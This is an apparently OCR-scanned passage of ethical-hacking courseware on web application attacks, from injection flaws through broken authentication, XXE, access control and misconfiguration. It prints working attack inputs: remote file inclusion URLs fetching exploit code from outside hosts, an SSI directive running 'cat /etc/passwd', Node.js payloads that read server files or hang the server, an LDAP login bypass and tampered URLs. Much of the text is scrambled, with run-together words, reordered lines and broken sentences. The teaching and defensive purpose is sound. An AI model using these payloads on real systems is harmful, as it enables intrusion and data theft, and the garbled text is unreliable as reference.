applicationusesanytypeof interpreter,attackersinsert malicious damage
codeto inflict
To perform various functions,web applications must use operating systemfeaturesand
externalprograms.Although manyprogramsinvokeexternally, a frequently
usedprogramis
the sendmailprogram. Carefully
scruban application
before passing a piece of information
through
an HTTPexternal
commands,
passesthesecharacters
attackers
Otherwise,
request. can
insert
special
and commandmodifiersinto the information.Theweb application
to the external system for execution. Inserting
malicious
characters,
then blindly
SQLcommands is a
dangerous practice and rather widespread,as it is a commandinjection method.Command
attacksare easyto carry out anddiscover,
injection but theyare difficultto understand.
Thefollowing
are some typesofcommand attacks:
injection
=
ShellInjection
© Anattackertries to craftan inputstringto gain shella ccessto a webserver
Shell injection functions include system(), StartProcess(),
Java. lang. Runtime. exec(), System.Diagnostics.Process.Start(), and
similar
APIs
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
HTML
Embedding
‘This
websites
virtually.
type of attackis usedto deface
addsextra HTML-based
Usingthisattack,an attacker
content to the vulnerableweb application
© embedding
In an HTML attack,placed
the user inputto a webscripti s into the

+
File
HTML
output
Injection
without
beingchecked
for HTMLcodeor scripting

© exploits
Theattacker thisvulnerability
andinjectsmaliciouscodeinto system
files
http: //wew.certifiedhacker.com/vulnerable.php?COLoR=http:
//evi
L/exploit?

ical andCountermensores
Mackin ©by E-Comel
Copyright
 CommandInjection
Example

CommandInjectionExample
attackerenters the following
‘An maliciouscode(account number)with a new password,

www. certi fiedhacker.com/banner.gif| |newpassword| |1036] 601468

Thelast two sets of numbersdenotethe bannersize. Oncethe attackerclicksthe submit
button,the password forthe account 1036is changed to “newpassword."
Theserver script
that ofbanner
assumes
imageinto
that
onlythe URL the file is inserted field.

A
codeinjecion
tes com

24.6: example
Figure Command
injection attack

Module4 1734
Page
©
by ical andCountermensores
Mackin Copyright E-Comel
 File Injection
Attack

etp: eww castiftedhacher con/axplet? <=

con/osdersphpTORDM-http://Jasonmval Bap
Code
ss srenotchstsd
sever
Aesteweinsnenterm we
| Sigtonthe
aa―
File Injection Attack
A file injectionattackis a techniqueusedto exploit “dynamic file include―
mechanisms i n web
applications. Fileinjectionattacksenableattackersto exploit vulnerable on the server to
scripts
a
Use remote file insteadof a presumably
a user is allowedto supply
validatedbeforeprocessing.
trustedfile fromthe localfile system.
inputfortheincludecommand
Whena user the provides
dynamically,
It occurs when
whichis not properly
input,the webapplication passes i t into
“ileinclude―
commands. Most web applicationframeworkssupportfile inclusion.Hence, an
attackerenters a URLthat redirectsthe application to the locationof the maliciousfile. While
referring
to the file without propervalidation,the application executesthe file scriptbycalling
specific
procedures. Webapplications attacksif the referred
are vulnerableto file injection files
are relayed
because
usingelementsfrom HTTPrequests.
of the extensive use of “file
configurations.
PHPis particularly
includes― to
vulnerable theseattacks
in PHPprogrammingand defaultserver

If the applicationendswith a phpextension,and if a user requestsit, then the application

Interpretsi t as phpscriptand executes it. This allows an attackerto perform arbitrary
commands.
<form method="get">
the
Consider following clientcoderunningi n a browser:

<select name="DRINK">
<option value="pepsi">pepsi</option>
<option value="coke">coke</option>
</select>
<input type="submit">

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Vulnerable
PHPcode:
<?php
Sdrink
Af
=($_GET['DRINK']
(Asset
;
‘coke!
) )
=§_GET[‘DRINK'];
Sdrink

.
require( §drink '.php’
)
>
To exploitthe vulnerable phpcode,the attacker injectsa remotelyhostedfile at
www.jasoneval.com,
whichcontainsan exploit.
Exploit
code:
http://www php?DRINK=http://jasoneval.com/exploit?
certifiedhacker.com/orders.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attacks
LDAP Injection
"©LOA?ovrectryServices
store and
organsntrmation basedon ts i herrehically
attibve, T h einformation

inictonmodel, using
ters
{©LoAP basedonthecent server andcentscan search
through
dretoryentries

LDAP attacks re smi

LOAP
fers
SL nctionattacks,b ut expt user parameters
t to generatean LOAP
query

to LDAP
tree
techniques
LDAP injection tae advantage
of non vadatedwebapplicationInputvlnerablities
an pass
‘ued
or searching
rectory Services ec
t oobtain access databases Behindom

an is quar
Tetestf appiation vlnerabeto LOAPcode jection,senda othe rer thatgenerates
the LDAPserverretune an ero, lca beexploited
with codejection techngues
an nv inp

Login
‘Account

= 1p Uamame [coca]

LDAPInjection
Attacks
LDAPDirectory
Services
store andorganize informationbasedon its attributes.Theinformation
is hierarchically
organized as a tree of directory
entries. TheLightweight Directory Access
Protocol(LDAP) model,andclientscan searchthe directory
is basedon the client-server entries

using
filters.

Module4 1727
Page ical Mackin
and ©
Countermensores
Copyright
by E-Comel
An LDAPinjection attackworksin the same wayas an SQLinjection attack,but it exploits
user
parameters to generate a n LOAP protocol
query. It runs on an Internet transport suchas TCP,
andit is an open-standard formanipulating
protocol andqueryingDirectory Services.An LDAP
injectiontechnique is used to take advantage of non-validatedweb application input
vulnerabilitiesto passLDAPfiltersusedforsearching Directory to obtaindirecta ccess
Services
to databases behindan
LDAPattacksexploit
LDAP
tree.
web-basedapplications constructedbasedo n LDAPstatements usinga
localproxy.Webapplications mayuse user-supplied inputto create custom LDAPstatements
for dynamic web pagerequests. Attackerscommonly perform LDAPinjection attackson web
applications employinguser inputs to generateLDAPqueries.Theattackerscan use the search
filter attributesto discoverthe underlying LOAPquery structure. Usingthis structure,
the
attackerincludes additionalattributesin the user-supplied
inputto determinewhetherthe
application is vulnerable
to LDAPinjection andevaluatestheweb application'soutput.
Depending
o n the implementation
of thetarget,
attackersuse LDAPinjection
to achieve
=
Loginbypass
=
Information
disclosure
=

+
Privilege
escalation
Informationalteration
Example:
To test if an application is vulnerable
to LDAPcode injection, senda query to the server that
generates an invalid input.If the LDAPserver returns a n error, it can be exploited
with code
techniques.
injection
AccountLogin
{[

username cortifiedhacker(4))
Password [blah

Figure
LDAP
14.8:
injectionattackexample
If an attackerenters a valid username “certifiedhacker" and injectscertifiedhacker)(&)),then
the URLstring becomes (&(USER=certifiedhacker)(&))(PASS=blah)). TheLOAPserver processes
onlythe first filter;onlythe query (&(USER=certifiedhacker)(&)) is processed.Thisquery is
always true,andtheattackerlogs into the systemwithout a valid password
An important defensemethodagainst suchattacks
i s to filterall inputs to the LDAP;
otherwise,
vulnerabilitiesin LDAPallow the execution of unauthorizedqueriesor modificationof its
contents. Whenthe attacker modifies the LDAPstatements,the process runs with the same
permissions as the component of theweb application that executedthe command.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Other Injection
Attacks

Inject
Includes ajo
Ani ee thee whet

|
injection
‘Template

tog
Injection o cnenveeted nt

CRLFInjection |

Other InjectionAttacks
Someothertypesof injection
attacksare discussed
below:
Server-Side JSInjection
Server-side
JavaScript
injections thatmanifestwhenan application
are vulnerabilities
user-controllable
integrates dynamically
valuesinto a stringthat the code interpreter
validates.Attackersexploit
improper
alter the codethat will be compiled
validationof user dataandpass randomvalues
andexecutedbythe server. Thesevulnerabilities
alsoallowattackersto compromise the functionality anddataof the applications
to
hosted
bythe server. Attackerscan alsouse the server as a source to launchfurtherattackersi n
the target network.
ofserver-side
Example JavaScript
injection:
can launch
‘Attackers a DoSattackbypassing function:
to the eval()
commands
while (1)
Thiscommand forcesthe server's event loop
to use the complete time and
processer
restrictsit fromevaluatingadditionalinputsuntil the processis reinitiated.
content fromthe server. Thefollowing
Attackerscan alsoreadthe files’ commands
can
the content ofthecurrent andparentdirectories:
display
res.end(require(‘fs’) .readdirsyne('.’) toString())
res.end(require (‘fs’)
.readdirsyne(‘..’).toString())
the file names,attackerscan passthe following
After retrieving commandsto readthe
content insidethe file:

ical andCountermensores
Mackin ©by E-Comel
Copyright
res.end(require(‘fs’)
Thisvulnerability
.readFileSync
(filename)
by
)
andmalicious
binary
files
further initiating running
can be exploited

Server-Side
£s
usingthemodules and child process
IncludesInjection
Server-side Includesis an application
featurethat helps designers the
to auto-generate
content ofthe webpagewithoutmanual involvement. allowdevelopers
The# directives
to perform Thesedirectivesc an be files,
this activity. CGIvariables,
shellcommands,
etc.
Afterevaluating allthedirectives,
HTML is delivered to the requester.
Typical
directives
include:
<!_ Hinclude virtual= “/footer.html―
-->

<!__Hechovar= “DATE_LOCAL―
-->

Attackerslaunchserver-sideinjectionattacksto take control over web applications

integratedwithSSIdirectives.Suchan application accepts remote user inputsand uses
them o n the page.Attackersexploit this featureand pass maliciousSSIdirectivesas
inputvaluesto perform malicious activities suchas modifying and erasingserver files,
running shellcommands, andtaking controlover criticalfilessuchas "/etc/passwa―,
For example, attackersmay use the following maliciousdirectivethat resultsi n the
retrievalofdatafrom/etc/passwad files,as thereis no evaluationofthe user inputs:
<!__flexec cmd="cat/etc/passud―
-->

Template
Server-Side Injection
While creatingdynamicpages,designersor developers
use template engines to
segregate
programminglogic Thus,
fromdatapresentation. insteadof storing
codethat
accepts andextracts therequired
requests information
fromthe databaseandpassingit
to users in monolithicdata file,template
enginesare employed the
to segregate
ofthedatafromthe remaining
presentation
template
Server-side
code
that
evaluatesi t
injectionoccurs when users are allowedto insert unsafeinputs
template.
into a server-side Whenthisvulnerability exists,attackerscan inject malicious
template directives
to run arbitrarycodeandgaincomplete controlover the targetweb
server. Thisinjectionis similarto XSSbut is often employed to targetserver internals
andachieveremote code execution,making every vulnerableapplication a primary
target.Templateinjectionmanifestsv ia designers’
codeerrors anddeliberatetemplate
whileshowcasing
disclosure richfeatures ofapplications,
blogs, etc.
Forexample,considerthe followingcomplex PHPandHTMLcode:
<html>
<head>
<title>((title}}</title>
</head>
<body>
<form method =
“{{method}}―
action =
“{{action}}">

ical andCountermensores
Mackin ©by E-Comel
Copyright
<input type
=
“text―

==
n ame

<input type “password― name ==

“user―
value
“pwd―
value =""> =
“({username})">

<button type “submit―>Submit</button>

</form>
<p> This page took ((microtime(true) time)) seconds to render
-

</p>
</body>
</html>
Replace codeusingtemplate
the abovementioned enginesasfollows:
StemplateEnginenew TemplateEngine
=
=

(); ;
Stomplate $templateingine-> loadFile (‘signUp. tpl’)
Stemplate-> assign(‘title’, ‘login’);
Stomplate-> assign(‘method’,
$template-> assign(‘action’ ; ‘post’)
‘Singup.php’)
Stomplate-> assign(
‘username’,
Stemplate-> assign(‘time’, ;
getUsernameFromCookie())
microtime(true));
Stemplate-> show();
Theabovementioned code is vulnerableto template injection
a s it can execute native
functions.if attackersare ableto attachtemplatefileswith suchexpressions,theycan
run
any
arbitrary to
LogInjection
the
function
to gainaccess targetwebserver.

Attackerslaunchloginjection
attacksbyexploiting
unsanitized
or unvalidatedinputs
to
application logs.
Applicationsusually
store a large numberof logs
suchas accesslogs,
transaction logs,
monitor logs,
exceptionor error logs,
GClogs,and crashlogs.If an
application failsto logusers’
or its administrator events or actions i n a secure manner,
attackerscouldinsert fake entries or recordsto corruptthe logfile. Attackersuse this
technique to insert misleading
informationi n the logfile forcoveringtheirtracksi n the
event of a successfulattack.
considera n application
Forinstance, that logs
datai n the following
format:
Date, Time, Username, ID, source IP, Request
Theunvalidatedinputparameterscome
directly
fromthe request
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3;
ideWalkin
username: xyz;

can manipulate
‘Attackers to save the logwith fakeinputs:
the id parameter
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3;
username: xyz;
id=\r\n

input)
(Fake

If
Forlog
fails
the the remainder
null bytes,
to escape
example,
ofthe stringis not recorded.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3;
username: xyz
id=400

can at the id field

Theindividuallogentry be prevented
Date, Time, Username,
HTML Injection
‘An
HTMLinjection attackis initiatedbyinjecting HTMLcodevia vulnerable forminputs
of a web page to change the appearance of the websiteor the informationprovidedto
its users. Itis differentfromJavaScript andVBscriptinjectionattacks. HTMLis a core
language employed to design a website,andit is often targeted
byattackersto change
its functionality andoriginal look.If an attackercan successfully injectHTML code,
legitimate users maybedivertedfromtheir intendedactivity

For instance, when the HTMLcode is injected, it allowsthe attackerto create a

maliciousformthatappearsto begenuineto theendusers. It requests usersto re-enter
thelr credentials.Oncethe form is submittedwith their credentials,
it exfiltratesthe
informationto theattacker.
Example:
<html> General
applicationpage: forsearchresults
template
<hi> Results matching the given query: </hi>
<h2> (user_query) </h2>
<ol> <li> Result A
<1i> Result B </ol>
</html>

User
query:
</n2>specialoffer
</a><h2>
<a href=www.certifiedhacker.com>malicious link

Resulting
pagefollowing
HTML injection:
<html>
<hi> Results matchingthe given query: </hi>
<h2></h2>special offer <a hrefswww.certifiedhacker. com>malicious
Link</a><h2></h2>
<ol> <li> Result A
<1i> Result B </ol>
</html>
However, the attacker aims to includeHTML code i n a pagethatotherusers visit. For
this purpose,codeinjection shouldbe includedin the pagecontent that is intendedto
beviewedbyend users. Theinjection o ccurs if applications
save untrusteduser inputs
and disclosedata to other users. For instance,a ssume that the abovementioned
application
consistsof a pageshowing the users’searchhistory:
Codesnippet(application
template) history
forsearch page
Module4 Page1762 ical andCountermensores
Mackin
©
Copyright
by E-Comel
<html>
<hi> Recent search history: </h1>
<ol> <1ipch2> (user_query_1) </h2>
<1ipcha> </h2></ol>
(user_query_2)
</html>
Resulting
searchhistory
page following HTMLinjection,
<html>
<hl> Recent search history: </hi>
<ol>
<1ip<h2> Top10 thriller movies </h2>
<1i>ch2></h2>special offer <a href=www.certifiedhacker.com>
malicious link</a><h2></h2>
</ol> </htmi>
Now,every searchresultlink that a user tries to access will displaya maliciouslink
generated
by
viewingthe content generated
thatpageare exfiltrated
usertothe
theattacker.I f any is attracted
fromattacker'sdomain,
to theattacker.
link andopensit, he/she be
and any credentialsenteredon will
CRLFInjection
Ina carriage return line feed(CRLF) attackersinjectcarriage return (\r)
attack,
injection
and line feed {\n)charactersinto the user'sinput to trick the web server, web
application,
or user into believing
that the current object
is terminatedanda new object

has
been initiated. is a vulnerabilitymanifests
injection
CRLF
CRLFcharactersinto an application.
differentInternet protocols,
Thesecharacterssignify that when
auser
enters
the
the end of the line for
which,when combinedwith HTTP request/response
headers,can lead to various vulnerabilitiessuchas HTTPrequestsmuggling and
responsesplitting,
HTTPrequestsmuggling can occur whenan HTTPrequesti s transmittedvia a server,
whichserves as a proxy to validateandforwardthe requestto the next server. Such
vulnerabilities
can alsoleadto furtherattacks
suchas cache
poisoning,firewallsecurity
breach,
andrequest hijacking,
In HTTP response splitting,
attackerscan includearbitrary HTTP headersfor the HTTP
response to split
the responseandbody. It resultsi n delivering instead
two responses of
whichcan leadto furthervulnerabilitiessuchas cross-sitescripting,
‘one,
Consider
the
following
thattheadmin
‘Suppose
example
panel log hasa
i n log
of CRLFinjection files:
filewiththe IP time andURLpathofthe visited
site as follows:
10.10.10.10 -
09:25 -
/index.php?page=about

ical andCountermensores
Mackin ©by E-Comel
Copyright
If an attackercan embedCRLFcharacters then he/she
into the HTTPrequest, c an
change
the outputflow and can enter fake logentries. Furthermore,the attackercan
alterthewebapplication a s follows:
response
/Andex.php?page=about
é40d¥0a127.0.0.1 -

09:25-
/Andex. php?page=about
érestrictedaction=edit
Here,80d and¥0aare CRandLFencodedcharacters.
Afterinjecting characters,
CRLF
the logentries appear as follows:
10.10.10.10 -

/index.php?page=abouté
09:25 -

127.0.0.1 =
/index.php?page=homesrestrictedaction=edit
09:25 ~

Attackersexploit injectionvulnerabilitiesto manipulate

CRLF logentries to hide their
malicious
activities.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 2 -

BrokenAuthentication
(©tacks
can in
Impersonate
ners
exploit
users
authentication functions
or session management suchas
exposed
accounts,

Session
IDURLsPassword
‘Timeout
in
Exploitation Exploitation

= Q
A2- BrokenAuthentication
Authenticationand session management
includesevery aspectof user authenticationand
managementof active sessions. At present,web applications implementing solid
authenticationsfall becauseof weak credentialfunctionssuchas “change my password,―
“forgot
my password,― “remember “account
my password,― update,―and so on. Therefore,
developers must takethe utmost care to implementuser authenticationsecurely. It is always
better to use strongauthenticationmethodsthrough specialsoftware-and hardware-based
cryptographic tokensor biometrics.An attackerexploits
vulnerabilitiesin theauthenticationor
session management functionssuch as exposed accounts, session IDs,logout, password
management, timeouts, rememberme, secret question,account update, and others to
impersonate
users.
=
Session URLs
o
ID
in
Example:
web application
‘A creates a sessionID forthe respective loginwhena user logsinto
http: //certifiedhackershop.com. An attacker uses a sniffer to sniff the
cookiethat contains the sessionID or tricksthe user into gettingthe sessionID.The

http: enters
attackern ow the followingURLi n hisbrowser's
//certifiedhackershop.com/sale/saleitems=304;
addressbar:
jsessioni
2OMTOIDPXMOOQSABGCKLHCJUN2IV?dest=NewMexico
This redirectshim tologged
the already in page of the victim. The attacker

successfully
impersonatesvictim. the

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Exploitation
Password
Attackers can identifypasswords stored in databasesbecauseof weak hashing
algorithms. password
Attackerscan gainaccess to the web application's databaseif user
passwords are not encrypted, which allows the attacker to exploitevery user's
password.
TimeoutExploitation
If an application's
sessiontimeouts are set to longer durations,
the sessionswill lastuntil
the time specified,i.e., the session will be valid for a longerperiod. Whenthe user
closesthe browser without logging out fromsites accessedthrough a public computer,
the attackercan use the same browserlater to conductthe attack, as sessions IDs can
remain valid;thus,they c an exploit the user's
privileges.
© Example:
‘Auser logsi n to www.certifiedhacker.com using his/her credentials.After
performing certain tasks, he/shecloses thewebbrowserwithoutlogging out ofthe
page.Thewebapplication's
if an attackerhasphysical
session interval,
launchthe browser, checkthe history,
is
sessiontimeout set to two hours.During
access to the user’s
system,
the specified
he may then
andclickthe www.certifiedhacker.com link,
whichautomatically redirectshimto the user'saccount without the needto enter
theuser'scredentials.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 3 -

SensitiveData Exposure
‘a
web
data
Mary aplations donotproperty
oom
unauthorised
wars
sensitive
protecthelr

Valnerable
Code

3 -

SensitiveData Exposure
Webapplications needto store sensitive informationsuchas passwords, creditcardnumbers,
account records,or otherauthentication
do not maintain propersecurity
as attackers
information
of their storage
can accessthe storage
i n a database
locations,
andmisusetheinformation.
a
or on filesystem.
then the application
If users
maybe at risk,

Many do not protecttheirsensitive data properly

webapplications fromunauthorizedusers.
Web applications
use cryptographic
algorithms to encrypttheir data and other sensitive
informationthattheyneedto transfer fromthe server to the clientor vice versa. Sensitivedata
exposureaccurs dueto flawssuchas insecure cryptographic storage andinformationleakage.
Even thoughthe data is encrypted, some cryptographic encryption methodshave inherent
weaknesses allowing attackersto exploit
andstealthe data.Whenan application usespoorly
written encryption codeto encrypt and store sensitive data i n the database,
the attackercan
easily this flawandstealor modify
exploit weakly protected sensitive datasuchas creditcards
numbers, SSNs, and other authenticationcredentials.Thus, theycan launchfurther attacks
suchas identitytheftandcreditcardfraud,
Developers
can avoidsuchattacksusingproperalgorithms sensitive data.At the
to encrypt
same time,developers must takecare to store the cryptographic keys securely.
If thesekeys are
then attackerscan retrieve themeasily
storedat insecure locations, and decrypt the sensitive
data. Insecure storageof keys,certificates,and passwords alsoallowsthe attackerto gain
accessto the web application as a legitimate user. Sensitivedataexposurecan cause severe
lossesto a company. Hence, organizations must protectall their sources suchas systems or
othernetworkresources frominformationleakage byemploying proper content-filtering
mechanisms.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 screenshots
‘The belowshowpoorly vulnerable
encrypted codeandsecure codethatis properly
encrypted
using a secure cryptographic
algorithm.
Vulnerable Code

Figure
149:
unerable
cadeexample

SecureCode

Secure
14.10:
Figure
code example

Module4 1748
Page tical andCountermensores
Making by Comet
Copyright©
 A4 XML External Entity
-

(XXE)
(8 wit
nity
tacks
allows
te
pa
XML
ase forgery
Input
em occurXML
unelable
source
External
ppiations parser
serversidereques
on
[SSF] tackthatc n wen a iscnfigured

refer
(a tates cana
the
web XML
itis webappcation
|G. Wen this matious inputi s prcested
tan externaentitybyincu

bytheweaklyconfiquted
XMLpri
reference
of target
i nthe mallow
tenes
application,
input
the

(XE)
44-XMIL External Entity
XML ExternalEntityattack is a Server-sideRequest
‘An Forgery(SSRF) attack whereby an.
application can parseXMLinputfroman unreliable s ource becauseofthe misconfigured XML
parser.In this attack,a n attackersendsa maliciousXML inputcontaining a referenceto an
externalentityto thevictim'sweb application. Whenthis malicious inputis processed bya
weaklyconfigured XML parserof the targetweb application, it enablesthe attackerto access
protected filesandservices fromservers or connectednetworks.
SinceXML featuresare widely available, the attackerabusesthesefeaturesto create
documents or files dynamically
at the time of processing.Attackerstend to makethe most of
this attack, as it allowsthemto retrieve confidential data,perform DoSattacks, andobtain
sensitive informationvia HTTP(S); i n some worst-case scenarios, theymay even be able to
perform remote codeexecution or launcha CSRF attack on anyvulnerable service.

According to the XML1.0 standard, XML usesentities oftendefinedas storage units. Entities
are special featuresof XMLthat can access localor remote contents, and theyare defined
anywhere in a system via systemidentifiers. Theentities neednot bepartof an XMLdocument,
as they can come froman externalsystem as well.Thesystem identifiersthat act as a URIare
usedbytheXMLprocessor whileprocessing the entity.TheXMLparsingprocess replaces these
entities with their actualdata, and here, the attackerexploits this vulnerability byforcing the
XML parserto accessthe file or the contentsspecified byhim/her. Thisattackmaybemore
dangerous as a trusted application; processingof XML documentscan be abusedbythe
attackerto pivotthe internalsystemto acquireall sorts of internaldataof the system,
For example, the attackersendsthe following code to extract the systemdatafromthe
vulnerabletarget.

Module4 1749
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
Matclows
Request:

x
< Wie application
with weshy
Contgured Parser

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AS BrokenAccessControl
-

=—o

AS BrokenAccessControl
-
_

controlrefersto how a web application

Access
one
update,
grantsaccess to create,
[4|
anddeleteany
or function
record/content to users whilerestricting
some privileged a ccessto otherusers.
Brokenaccesscontrol is a methodin whichan attackeridentifiesa flaw related to access
control,bypasses the authentication, andthen compromises the network.Accesscontrol
weaknesses are common due to the lackof automateddetectionand effectivefunctional
testingbyapplication developers. They allowattackersto act as users or administratorswith
privileged
functionsandcreate,access, update, or deleteanyrecord.

Accordingto the OWASP 2017R2revision, brokenaccess controlis a combinationof insecure

directobjectreferenceandmissingfunction levelaccesscontrol.
Insecure Direct Object References: When developers expose various internal
implementation objects suchas files,directories,databaserecords, or key-through
references,the resultis an insecure directobjectreference. For example, if a bank
account number is a primary key,there is a chanceof the application being
compromised byattackers whotakeadvantage ofsuchreferences.
Missing
FunctionLevel AccessControl: In some web applications,
function level
protectionis managed via configuration,
and attackersexploitthesefunction level
access control flawsto access unauthorizedfunctionality.
The main targetsof the
attackersi n this scenario are the administrativefunctions.Developers must include
propercodechecks to prevent suchattacks.
Detecting suchflawsis easyforan attacker;
however, identifying the vulnerablefunctions or web pages (URLs) to attack is

considerably
difficult.
ical andCountermensores
Mackin ©by E-Comel
Copyright
 A6 -

Security
Misconfiguration

‘read/write
ies
unprotected andrectors, te

‘Layer
Protection hed
roteevonexposure datato utrusted
pares
secuneon esdto theft

AG -

Security
Misconfiguration
Developers
and networkadministratorsshould ensure that an entire application
stackis
configured
properly;
otherwise, misconfiguration
security can occur at any levelof the stack,
including its platform, web server,application server,framework, and custom code. For
instance,if the developer does not configure the server properly,
it couldresulti n various
problems that can affect the site security. Problemsthat lead to suchinstances include
Unvalidatedinputs,parameter/form
layer
protection, etc.
tampering,
improper
errorinsufficient
transport
handling,
Unvalidated Inputs
Inputvalidationflawsrefer to a web application vulnerability
whereby inputfrom a
clientis not validatedbeforebeing processed byweb applicationsbackendservers.
No validationor improper validationcan makea web application
inputvalidationattacks.If web applications implement
and
vulnerableto various
inputvalidation onlyon the
client side,attackerscan easily bypass it bytampering with the HTTPrequests, URLs,
headers, formfields, hiddenfields,andquery strings. login
Users’ IDsandotherrelated
data are storedi n the cookies,whichbecomea means of attack.An attackerexploits
inputvalidation
etc,resulting
flawsto performcross-sitescripting,
i n datatheft andsystemmalfunction, buffer
overflow,
injection attacks,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Parameter/Form
Tampering
Figure 14.13:
Input
attack
Unvalidated

‘A
web parametertampering attackinvolvesthe manipulation
of parameters exchanged
betweenthe clientandthe server to modify application
datasuchas user credentials,
andpermissions,prices,andquantitiesof products.
Thisinformation is actually storedin
cookies,hiddenformfields, Theweb application
or URLquery strings. uses it to increase
its functionality
and control.A man-in-the-middle(MITM) attackis an example of this
typeof attack.Attackersuse toolssuchas WebScarab and WebSploit Frameworkfor
theseattacks.
Parametertampering is a simple typeof attack aimed directly at an application’s
business logic.
It takesadvantage of the factthat manyprogrammers relyon hiddenor
fixedfields(such as a hiddentag in a form or a parameter in a URL)
as the only security
measure for certain operations. To bypass this security mechanism, an attackercan
change these parameters. A parameter tamperingattack exploits vulnerabilities
in
integrityandlogic validationmechanisms that may resulti n XSS,SQLinjection,etc
DetailedDescription:
Aftera sessionis established
betweenthewebapplication andthe user, an exchange of
parameters betweenthe webbrowserandthe web application takesplace to maintain
information the needto maintain a complex
abouta client'ssession,whicheliminates
databaseon the server side.A web application
uses URLqueries,form fields,
and
cookiesto passtheseparameters.
Changing in the formfieldis the bestexample
parameters of parameter
tampering,
Whena user selectsan HTMLpage, it is storedas a formfieldvalueandtransferredas
HTTPpageto the web application.
‘an Thesevaluesmaybe pre-selected (combo box,
checkbox,radio buttons, etc.),free text, or hidden,An attackercan manipulate
these
values.In some extreme cases,the attackinvolvessavingthe page,editing the HTML,
andreloading the pagei n thewebbrowser.
Hiddenfieldsthat are invisibleto the end user provideinformationstatus to the web
application,
For example, considera product orderformthat includes the following
hidden
field:
<input type="hidden"name="price―
value="99.90">

ical andCountermensores
Mackin ©by E-Comel
Copyright
Comboboxes, checkboxes, andradiobuttonsare examples of pre-selected
parameters
usedto transferinformationbetweendifferent pageswhile allowing
one of severalpredefined
manipulatethesevalues.
values.In a parameter tampering
the
attack, user
to select
an attackermay

considera formthat includesthe following

For example, combobox:

Source Account: <SELECTNAME="sreace">

<OPTION VALUE="123456789">+#####789</OPTION>
<OPTION VALUE=" 868686868">Â¥#*44%868</OPTION></SELECT>
<BR>Amount: <INPUT NAME="Anount" SI2E=20>
<BRDestination Account: <INPUT NAME="DestAce―S12
<BROCINPUTTYPE=SUEMIT><INPUTTYPERESET>
</FoR
Bypassing:
{Anattackermaybypass theneedto choosebetweentwo accounts byadding
another
account i n the HTMLpage source code.Thewebbrowserdisplays
the new combobox,
andtheattackercan choose thenew account.
HTMLformssubmittheirresultsusingone of two methods: GETor POST. In the GET
method, all formparameters
of
andtheirvaluesappear i n the query stringthe next URL,
whichthe user sees. An attackermay tamperwith this query string.For example,
considera web page that allowsan authenticateduser to selectone of his or her
accountsfroma combo boxanddebitthe account with a fixedunit amount. Whenthe
user clickson a submitbutton i n the web browser,
the URLrequest is as follows:

hetp://iner.certi
fiedhackerbank..com/cust.asp?profile=214debit=2500
The attackermay change (profile
the URLparameters and debit)
to debit another
account:
hetp://ev.certi
fiedhackerbank..con/cust.asp?profile=826debit=1500
The attackercan modify other URLparameters,including
attribute parameters and
internalmodules.Attribute parameters
are unique parametersthat characterize
the
behavior of the uploading
page. For example,
considera content-sharing
web
application
that enablesthe content creator to modify
the content,whileother users
can only
view thecontent. Theweb server checkswhetherthe user who is accessing
an
entryis the author or not (usually
via cookies).An ordinary user will requestthe

following link
hetp://mav.certi
fiedhackerbank.com/stat.asp?pg=S31Gstatuseview
Theattackercan modify
the status parameter
to “delete―
to delete permission
for the
content.
heep://www.certifiedhackerbank.con/stat. asp?pg=147éstatussdelete

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Parameter/form
tamperingc an leadto theftof services, escalationof access,s ession
hijacking, the identity
and assuming of other users, as well as parameters that grant
accessto thedeveloper
anddebugging
information,

hangedincluding,
toto para

Figure
14.14: Tampering
Parameter attackexample

Improper
Error Handling
Otherwise,
Improper
to
It is necessary definehowa system
the error mayprovide
error handling
or networkshouldbehave whenan error occurs.
a chancefor an attackerto break into the system.
mayleadto DoSattacks.
Improper error handling providesinsightsinto thesource code, suchas logic flawsand
defaultaccounts, whichthe attackerc an exploit.Usingthe informationreceivedfroman
error message,a n attackeridentifiesvulnerabilities for launching various web
applicationattacks.Improper exception handling occurs whenweb applications do not
limitthe amountof information theyreturn to their users. Information leakage may
include helpfulerror messagesand service banners. Developers and system
administrators often forgetor disregardhow an attacker can use something as simple as
a server banner.Theattackerwill start searching
andattemptto leverage
for a place
informationthat applications freely
to
identify
vulnerabili
volunteer.

Module4 1756
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 General
Error

14.15:ScreenshotapayngInproperrors
Figure
Theattackercan gather
thefollowing fromimpropererror handling
information
Null pointer
system
exceptions
eal failure
Database
unavailable
Networktimeout
Database
information
Webapplication
logical
flow
©
Application
environment
InsufficientTransport Protection
Layer
Insufficienttransportlayer protection is a security flawthat occurs whenan application
fails to protectsensitive traffic flowing i n a network.It supports weakalgorithms and
uses expired or invalidcertificates.Developers shoulduse SSL/TLS authenticationfor
authenticationon the websites; otherwise, an attackercan monitor the networktraffic.
Unlesscommunication betweenwebsitesand clients is encrypted, data can be
intercepted, injected, or redirected.An underprivileged SSLsetupcan also helpthe

System
to
attacker launchphishing andMITM attacks.
mayleadto various otherthreatssuchas account theft,phishing
compromise
attacks,
and compromised layerprotection
adminaccounts.Thus,insufficienttransport
may allow untrusted third partiesto obtain unauthorizedaccess to sensitive
information.
All thisoccurs whenapplications supportweakalgorithms usedfor SSLand
whentheyuse expired or do not use themcorrectly
or invalidSSLcertificates

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Example
Assumethat auser logsinto an online banking application
that possesses insufficient
layerprotection
transport (j.e.,it is not SSLencrypted).
The sensitive data i n the
‘communication session1D)
(e.g., can bevulnerableto attackduringtransit in plaintext
format.Thisallowsan attackerto stealsuchdatato perform
various typesof attackson
the application,

problems
are
as
follows:
Someserver configuration
+

Server
flaws
software
+
Enabling
unnecessary
services
+

+
Improper
authentication
laws
Unpatched security
+

Server
configuration
scanners help
‘Automated
problems
to detect a few of theseproblems.
